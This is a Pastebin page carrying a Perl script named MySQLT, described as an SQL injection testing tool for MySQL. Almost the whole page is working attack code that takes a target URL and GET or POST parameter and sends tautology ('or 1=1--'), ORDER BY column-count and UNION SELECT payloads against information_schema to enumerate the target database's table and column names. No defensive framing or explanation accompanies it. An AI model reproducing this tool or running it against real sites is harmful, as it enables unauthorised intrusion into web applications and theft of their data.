Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- use strict;
- use warnings;
- use Getopt::Long ();
- use HTML::Parser;
- use LWP::UserAgent;
- use Scalar::Util qw(looks_like_number);
- use HTTP::Request::Common qw(POST);
- # _____ ________________ .____ ___________
- # / \ ___.__./ _____\_____ \ | | \__ ___/
- # / \ / < | |\_____ \ / / \ \| | | |
- # / Y \___ |/ / \_/. | |___| |
- # \____|__ / ____/_______ \_____\ \_|_______ |____|
- # \/\/ \/ \__> \/
- # SQL Injection testing tool for MySQL
- sub usage {
- my $message = $_[0];
- if (defined $message && length $message) {
- $message .= "\n"
- unless $message =~ /\n$/;
- }
- my $command = $0;
- $command =~ s#^.*/##;
- print STDERR (
- $message,
- "MySQLT - SQL Injection testing tool for MySQL\n" .
- "usage: $command -u url (-p POST | -g GET) -v true value -e extra [-c]\n" .
- " ...\n" .
- " ...\n" .
- " Mattia Paccamiccio && Matteo Cecconi \n"
- );
- die("\n")
- }
- my $inputurl;
- my $post;
- my $get;
- my $value;
- my $extra;
- my $enum;
- my $ua = LWP::UserAgent->new;
- my @match;
- my @outputcolno;
- my @tablenames;
- my @columnnames;
- my $column_last = 0;
- my $column_no = 1;
- my $query_select;
- my $req2;
- my $req;
- my $req3;
- my $response;
- my $response2;
- my $response3;
- my $parser;
- my $x = 0;
- my $outputcolumnno;
- my $dbname;
- Getopt::Long::GetOptions(
- 'u=s' => \$inputurl,
- 'p=s' => \$post,
- 'g=s' => \$get,
- 'v=s' => \$value,
- 'e=s' => \$extra,
- 'c' => \$enum
- # 's=s' => sub {
- # local *_ = \$_[1];
- # /^([^:]+):(\d+)$/
- # or die("Invalid format for option s.\n");
- # $host = $1;
- # $port = $2;
- # },
- )
- or usage("Invalid commmand line options.");
- usage("missing url.")
- unless defined $inputurl;
- usage("missing request")
- unless defined $post or $get;
- usage("missing value.")
- unless defined $value;
- if(defined $get and defined $post) {usage("cannot inject 2 varibles together");}
- print '
- _____ ________________ .____ ___________
- / \ ___.__./ _____\_____ \ | | \__ ___/
- / \ / < | |\_____ \ / / \ \| | | |
- / Y \___ |/ / \_/. | |___| |
- \____|__ / ____/_______ \_____\ \_|_______ |____|
- \/\/ \/ \__> \/
- SQL Injection testing tool for MySQL
- Developed by Mattia Paccamiccio & Matteo Cecconi
- ';
- check_injectable();
- is_vuln();
- #### AGGIUNGERE OR 1=1
- while ($x == 0) {
- print "column number test: $column_no \n";
- my $test;
- if(defined $post) {
- $req3 = POST $inputurl,
- [ $post => $value." order by $column_no--", errors => 0 ];
- $response3 = $ua->request($req3);
- $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
- $parser->parse( $response3->decoded_content );
- $test = &column_test();
- } elsif (defined $get) {
- $response3 = $ua->get("$inputurl?$get=$value+order+by+$column_no--");
- $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
- $parser->parse( $response3->decoded_content );
- $test = &column_test();
- }
- if(looks_like_number($test)){
- print "last column #:";
- print &column_test();
- print "\n";
- $x = 1;
- } else {
- $column_no++;
- }
- }
- if(defined $enum) {
- if (defined $post) { #post
- columns_analyze($inputurl,$post,$value,$column_last);
- } elsif (defined $get) { #get
- columns_analyze($inputurl,$get,$value,$column_last);
- }
- print "Columns which give an output are: ";
- foreach my $colno (@outputcolno) {
- print $colno." ";
- }
- }
- if(defined $enum) {
- print "\n Type the column number: ";
- $outputcolumnno = <STDIN>;
- chomp $outputcolumnno;
- ##### fai controllo colnumber
- #if (defined $post) {
- # $dbname = extract_dbname($inputurl,$post,$value,$column_last);
- #} elsif (defined $get) {
- # $dbname = extract_dbname($inputurl,$get,$value,$column_last);
- #}
- if (defined $post) {
- extract_tablenames($inputurl,$post,$value,$column_last,$dbname);
- extract_columnnames($inputurl,$post,$value,$column_last,$dbname);
- } elsif (defined $get) {
- extract_tablenames($inputurl,$get,$value,$column_last,$dbname);
- extract_columnnames($inputurl,$get,$value,$column_last,$dbname);
- }
- }
- sub text_handler {
- chomp( my $text = shift );
- if ( $text =~ //i ) {
- push @match,$text;
- #print "Matched: $text\n\n\n";
- }
- #foreach(@match) {
- #print $_, "\n";
- #}
- }
- sub check_injectable {
- if(defined $post){
- $req = POST $inputurl,
- [ $post => $value, errors => 0 ];
- $req2 = POST $inputurl,
- [ $post => $value."'", errors => 0 ];
- $response = $ua->request($req);
- $response2 = $ua->request($req2);
- } elsif (defined $get) {
- $response = $ua->get("$inputurl?$get=$value");
- $response2 = $ua->get("$inputurl?$get=$value'");
- }
- $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
- $parser->parse( $response->decoded_content );
- $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
- $parser->parse( $response2->decoded_content );
- my $arrsize = scalar @match;
- my $halfarr = ($arrsize/2);
- my $arrincrement = $halfarr;
- for (my $cnt=0; $cnt<$halfarr ; $cnt++) {
- my $cnt2 = $cnt+$arrincrement;
- if ($match[$cnt] ne $match[$cnt2]) {
- #print "$match[$cnt] $match[$cnt2] \n";
- $cnt = $halfarr;
- print "Seems vulnerable, trying to exploit...\n";
- last;
- }
- else {
- #print "$match[$cnt] $match[$cnt2] \n";
- print "Not vulnerable.";
- exit;
- }
- }
- }
- sub is_vuln {
- @match = ();
- my $neg = "-".$value;
- my $req_v;
- my $req2_v;
- my $response_v;
- my $response2_v;
- if(defined $post){
- $req_v = POST $inputurl,
- [ $post => $neg, errors => 0 ];
- $req2_v = POST $inputurl,
- [ $post => $neg." or 1=1--", errors => 0 ];
- $response_v = $ua->request($req);
- $response2_v = $ua->request($req2);
- } elsif (defined $get) {
- $response_v = $ua->get("$inputurl?$get=$neg");
- $response2_v = $ua->get("$inputurl?$get=$neg or 1=1--");
- }
- $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
- $parser->parse( $response_v->decoded_content );
- $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
- $parser->parse( $response2_v->decoded_content );
- my $arrsize = scalar @match;
- my $halfarr = ($arrsize/2);
- my $arrincrement = $halfarr;
- for (my $cnt=0; $cnt<$halfarr ; $cnt++) {
- my $cnt2 = $cnt+$arrincrement;
- if ($match[$cnt] ne $match[$cnt2]) {
- print "Vulnerable!\n";
- last;
- }
- else {
- exit;
- return;
- }
- }
- }
- sub column_test {
- @match = ();
- $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
- $parser->parse( $response->decoded_content );
- $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
- $parser->parse( $response3->decoded_content );
- my $arrsize = scalar @match;
- my $halfarr = ($arrsize/2);
- my $arrincrement = $halfarr;
- for (my $cnt=0; $cnt<$halfarr ; $cnt++) {
- my $cnt2 = $cnt+$arrincrement;
- if ($match[$cnt] ne $match[$cnt2]) {
- $column_last = $column_no-1;
- return $column_last;
- }
- else {
- return;
- }
- }
- }
- sub columns_analyze {
- my $target_url;
- my $form;
- @match = ();
- if(defined $post) { #POST
- my ($targeturl,$post,$value,$column_last) = @_;
- $target_url = $targeturl;
- $query_select = "$value union select ";
- $form = $post;
- } elsif(defined $get) { #GET
- my ($targeturl,$get,$value,$column_last) = @_;
- $query_select = $targeturl."?".$get."=".$value."+union+select+";
- }
- for (my $i=1;$i<=$column_last;$i++) {
- if($i<$column_last) {
- $query_select = $query_select."concat(0x4d7953514c5454657374,".$i.",0x4d7953514c5454657374),";
- } elsif($i == $column_last) {
- $query_select = $query_select."concat(0x4d7953514c5454657374,".$i.",0x4d7953514c5454657374)--";
- }
- }
- if(defined $post) {
- $req = POST $target_url,
- [ $form => $query_select, errors => 0 ];
- $response = $ua->request($req);
- $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
- $parser->parse( $response->decoded_content );
- } elsif(defined $get) {
- $response = $ua->get($query_select);
- $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
- $parser->parse( $response->decoded_content );
- }
- foreach my $match (@match) {
- if ($match =~ m/MySQLTTest(.*)MySQLTTest/) {
- if(looks_like_number($1)) {
- push @outputcolno, $1;
- }
- }
- }
- }
- sub extract_tablenames {
- my $target_url;
- my $form;
- my $schema_tablenumber;
- @match = ();
- if(defined $post) {
- my ($targeturl,$post,$value,$column_last) = @_;
- $target_url = $targeturl;
- $query_select = "$value union select ";
- $form = $post;
- } elsif(defined $get) {
- my ($targeturl,$get,$value,$column_last) = @_;
- $target_url = $targeturl;
- $query_select = $targeturl."?".$get."=".$value." union select ";
- }
- for (my $i=1;$i<=$column_last;$i++) {
- if($i<$column_last && $i != $outputcolumnno) {
- $query_select = $query_select.$i.",";
- } elsif($i == $column_last && $i != $outputcolumnno) {
- $query_select = $query_select.$i." from information_schema.tables where table_schema = database()--";
- } elsif($i < $column_last && $i == $outputcolumnno) {
- $query_select = $query_select."concat(0x4d7953514c5454657374,count(*),0x4d7953514c5454657374),";
- } elsif($i == $column_last && $i == $outputcolumnno) {
- $query_select = $query_select."concat(0x4d7953514c5454657374,count(*),0x4d7953514c5454657374) from information_schema.tables where table_schema = database()--";
- }
- }
- if(defined $post) {
- $req = POST $target_url,
- [ $form => $query_select, errors => 0 ];
- $response = $ua->request($req);
- $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
- $parser->parse( $response->decoded_content );
- $query_select = "$value union select ";
- } elsif(defined $get) {
- $response = $ua->get($query_select);
- $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
- $parser->parse( $response->decoded_content );
- $query_select = $target_url."?".$get."=".$value." union select ";
- }
- foreach my $match (@match) {
- if ($match =~ m/MySQLTTest(.*)MySQLTTest/) {
- $schema_tablenumber = $1;
- }
- }
- @match = ();
- for (my $i=1;$i<=$column_last;$i++) {
- if($i<$column_last && $i != $outputcolumnno) {
- $query_select = $query_select.$i.",";
- } elsif($i == $column_last && $i != $outputcolumnno) {
- $query_select = $query_select.$i." from information_schema.tables where table_schema = database() limit TABLECOUNTERZ,1--";
- } elsif($i < $column_last && $i == $outputcolumnno) {
- $query_select = $query_select."concat(0x4d7953514c5454657374,table_name,0x4d7953514c5454657374),";
- } elsif($i == $column_last && $i == $outputcolumnno) {
- $query_select = $query_select."concat(0x4d7953514c5454657374,table_name,0x4d7953514c5454657374) from information_schema.tables where table_schema = database() limit TABLECOUNTERZ,1--";
- }
- }
- for (my $i=1;$i<=$schema_tablenumber;$i++) {
- @match = ();
- my $extract1 = join( $i, split("TABLECOUNTERZ", $query_select) );
- if (defined $post) {
- $req = POST $target_url,
- [ $form => $extract1, errors => 0 ];
- $response = $ua->request($req);
- $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
- $parser->parse( $response->decoded_content );
- } elsif (defined $get) {
- $response = $ua->get($extract1);
- $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
- $parser->parse( $response->decoded_content );
- }
- foreach my $match (@match) {
- if ($match =~ m/MySQLTTest(.*)MySQLTTest/) {
- push @tablenames, $1;
- }
- }
- }
- }
- sub extract_columnnames {
- my $target_url;
- my $form;
- my $schema_columnnumber;
- my $enum_columnnumber;
- @match = ();
- foreach my $tabs (@tablenames) {
- if(defined $post) {
- my ($targeturl,$post,$value,$column_last) = @_;
- $target_url = $targeturl;
- $query_select = "$value union select ";
- $form = $post;
- } elsif(defined $get) {
- my ($targeturl,$get,$value,$column_last) = @_;
- $target_url = $targeturl;
- $query_select = $targeturl."?".$get."=".$value." union select ";
- }
- for (my $i=1;$i<=$column_last;$i++) {
- if($i<$column_last && $i != $outputcolumnno) {
- $query_select = $query_select.$i.",";
- } elsif($i == $column_last && $i != $outputcolumnno) {
- $query_select = $query_select.$i." from information_schema.columns where table_schema = database() and table_name = '".$tabs."'--";
- } elsif($i < $column_last && $i == $outputcolumnno) {
- $query_select = $query_select."concat(0x4d7953514c5454657374,count(*),0x4d7953514c5454657374),";
- } elsif($i == $column_last && $i == $outputcolumnno) {
- $query_select = $query_select."concat(0x4d7953514c5454657374,count(*),0x4d7953514c5454657374) from information_schema.columns where table_schema = database() and table_name = '".$tabs."'--";
- }
- }
- #print $query_select;
- if(defined $post) {
- $req = POST $target_url,
- [ $form => $query_select, errors => 0 ];
- $response = $ua->request($req);
- $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
- $parser->parse( $response->decoded_content );
- $query_select = "$value union select ";
- } elsif(defined $get) {
- $response = $ua->get($query_select);
- $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
- $parser->parse( $response->decoded_content );
- $query_select = $target_url."?".$get."=".$value." union select ";
- }
- foreach my $match (@match) {
- if ($match =~ m/MySQLTTest(.*)MySQLTTest/) {
- $enum_columnnumber = $1;
- #print "\n counter: ".$1;
- print "\n Enumerating table ".$tabs.": \n";
- @match = ();
- for (my $i=1;$i<=$column_last;$i++) {
- if($i<$column_last && $i != $outputcolumnno) {
- $query_select = $query_select.$i.",";
- } elsif($i == $column_last && $i != $outputcolumnno) {
- $query_select = $query_select.$i." from information_schema.columns where table_schema = database() and table_name = '".$tabs."' limit COLUMNCOUNTERZ,1--";
- } elsif($i < $column_last && $i == $outputcolumnno) {
- $query_select = $query_select."concat(0x4d7953514c5454657374,column_name,0x4d7953514c5454657374),";
- } elsif($i == $column_last && $i == $outputcolumnno) {
- $query_select = $query_select."concat(0x4d7953514c5454657374,column_name,0x4d7953514c5454657374) from information_schema.columns where table_schema = database() and table_name = '".$tabs."' limit COLUMNCOUNTERZ,1--";
- }
- }
- for (my $i=1;$i<=$enum_columnnumber;$i++) {
- @match = ();
- my $extract1 = join( $i, split("COLUMNCOUNTERZ", $query_select) );
- if (defined $post) {
- $req = POST $target_url,
- [ $form => $extract1, errors => 0 ];
- $response = $ua->request($req);
- $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
- $parser->parse( $response->decoded_content );
- } elsif (defined $get) {
- $response = $ua->get($extract1);
- $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
- $parser->parse( $response->decoded_content );
- }
- foreach my $match (@match) {
- if ($match =~ m/MySQLTTest(.*)MySQLTTest/) {
- push @columnnames, $1;
- print $1." -- ";
- }
- }
- }
- }
- }
- @match = ();
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement